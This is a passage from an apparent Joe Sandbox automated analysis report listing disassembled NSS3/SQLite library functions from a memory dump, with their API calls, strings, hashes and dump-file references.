                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 200661885-0
                                                                                                                                                                                                                          • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                          • Instruction ID: 945f75ac4882d703893fb63a1888388a182236160d0d4d7e057436d2d442f703
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1701FBB0B01F0746E751AB764C20BE7B6E46F41299F10043E8869C6A40EF71D4488FA1
                                                                                                                                                                                                                          Function 6C45AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C45AFDA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C45AFC4
                                                                                                                                                                                                                          • unable to delete/modify collation sequence due to active statements, xrefs: 6C45AF5C
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C45AFD3
                                                                                                                                                                                                                          • misuse, xrefs: 6C45AFCE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                          • API String ID: 632333372-924978290
                                                                                                                                                                                                                          • Opcode ID: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
                                                                                                                                                                                                                          • Instruction ID: b33ea77313f702c5ac1db90167997aeb66b982713785292dd4adc0818f3df744
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A91DE71B012158FDB04CF69C850FBEBBF1AF49315F5985A8E865AB791C331AC12CBA0
                                                                                                                                                                                                                          Function 6C4BFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C4BFC55
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4BFCB2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BFDB7
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4BFDDE
                                                                                                                                                                                                                            • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
                                                                                                                                                                                                                            • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
                                                                                                                                                                                                                            • Part of subcall function 6C4C8800: EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
                                                                                                                                                                                                                            • Part of subcall function 6C4C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
                                                                                                                                                                                                                            • Part of subcall function 6C4C8800: PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                          • String ID: pkcs11:
                                                                                                                                                                                                                          • API String ID: 362709927-2446828420
                                                                                                                                                                                                                          • Opcode ID: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
                                                                                                                                                                                                                          • Instruction ID: 04912c9921f86caf619f5ef1bd80765c3a8b0a4b2fc8465d5f5b3cd43085b1af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 805192BDB062119BFB00CE649C80F9A3779AB4135AF150029DD0E7BB51EB31F9059BB2
                                                                                                                                                                                                                          Function 6C3FBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C3FBE02
                                                                                                                                                                                                                            • Part of subcall function 6C529C40: memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FBE9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C3FBE93
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FBE89
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C3FBE98
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 1135338897-598938438
                                                                                                                                                                                                                          • Opcode ID: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
                                                                                                                                                                                                                          • Instruction ID: 1818aa04d2354000f43be0c5aa805b65b7193723cb6893c1758cce3f78bc5516
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E73129B1A046558BC700CF69EC94AABBBA6AF6131CB094954EDA41FA41D371ED06CBE0
                                                                                                                                                                                                                          Function 6C4E6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E36
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E6E57
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E7D
                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6EAA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                          • String ID: nXl
                                                                                                                                                                                                                          • API String ID: 3163584228-2538165799
                                                                                                                                                                                                                          • Opcode ID: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                          • Instruction ID: c49815f9abc0e5669ee95ebcb9a269d5d8330df0aa218d38ab5b255f374e71b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931B47261061AEADB149E38CC04FD6B7A5AB0931BF12063DD699D6BC1EB30B854CB81
                                                                                                                                                                                                                          Function 6C471EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471EE2
                                                                                                                                                                                                                            • Part of subcall function 6C4D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C471D97,?,?), ref: 6C4D1836
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F13
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F37
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,dLGl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F53
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                                          • String ID: dLGl
                                                                                                                                                                                                                          • API String ID: 3216063065-398212957
                                                                                                                                                                                                                          • Opcode ID: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                          • Instruction ID: 4678c75727577981edfe768bd4cbb2d27b52a444159335b9a39608e6206d7d3d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E215071504256ABC750DE69DD10FDBB7E9AB88699F01092DEC48C3B40F730E659CBE2
                                                                                                                                                                                                                          Function 6C54A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A86D
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A8A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C54A89B
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C54A891
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C54A8A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                          • Opcode ID: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                          • Instruction ID: 964d37d72cc7f7c7b57013de4fe14943f3d64d1cbe433db0fd695e9eb64c5d1b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6110375A00214ABDB04CF21DC51EAEBBA1FF89314F008438FC094BA80FB34A916CBD6
                                                                                                                                                                                                                          Function 6C460DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C460BDE), ref: 6C460DCB
                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C460BDE), ref: 6C460DEA
                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C460BDE), ref: 6C460DFC
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C460BDE), ref: 6C460E32
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C460E2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                                                          • Opcode ID: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                          • Instruction ID: 0ead000c01a93c8b4b947bcab1bea45ccdaaf1f3bf4255ba57cf3543ef1b12b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7a6838a5388767d17cfb8320a39263042500360c41345fa392516e00ae42e13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701B1726016209FE620DB25DC45E2773B8DF86A09B0544ADE909D3B42E7A1FC158AE5
                                                                                                                                                                                                                          Function 6C51AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC2D
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC44
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]Pl,00000000,?,?,6C4F6AC6,?), ref: 6C51AC59
                                                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C4F6AC6,?,?,?,?,?,?,?,?,?,?,6C505D40,00000000,?,6C50AAD4), ref: 6C51AC62
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                          • String ID: @]Pl
                                                                                                                                                                                                                          • API String ID: 1595327144-545999589
                                                                                                                                                                                                                          • Opcode ID: 607fc93a073c8b1a229d17cb059adc61af64a3d440183de1b20d4f673ba32882
                                                                                                                                                                                                                          • Instruction ID: e01bb93db8b1dcff674fff8bbf7437bac68254876088701b93ec4e112c36d0da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 607fc93a073c8b1a229d17cb059adc61af64a3d440183de1b20d4f673ba32882
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C0178B56002009BEB01CF15ECC4F46B7A8AF54B1CF188068E8098FB06E731E808CBA2
                                                                                                                                                                                                                          Function 6C409C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C409CF2
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C409D45
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C409D8B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C409DDE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: 93b8601a29ec69275c2d5dedb3d8e3466c8fa2b5a872d19b48541dac1d5b805c
                                                                                                                                                                                                                          • Instruction ID: d14e7a5c182a7bfb7483a0cbfa786dbefc4cdfead7afb9fec6b7db1fa59d2644
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93b8601a29ec69275c2d5dedb3d8e3466c8fa2b5a872d19b48541dac1d5b805c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DA19071B846008BEB08EF64DC89F7A3775BF52316F19013DD4164BB40DB3AA946CB8A
                                                                                                                                                                                                                          Function 6C491E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
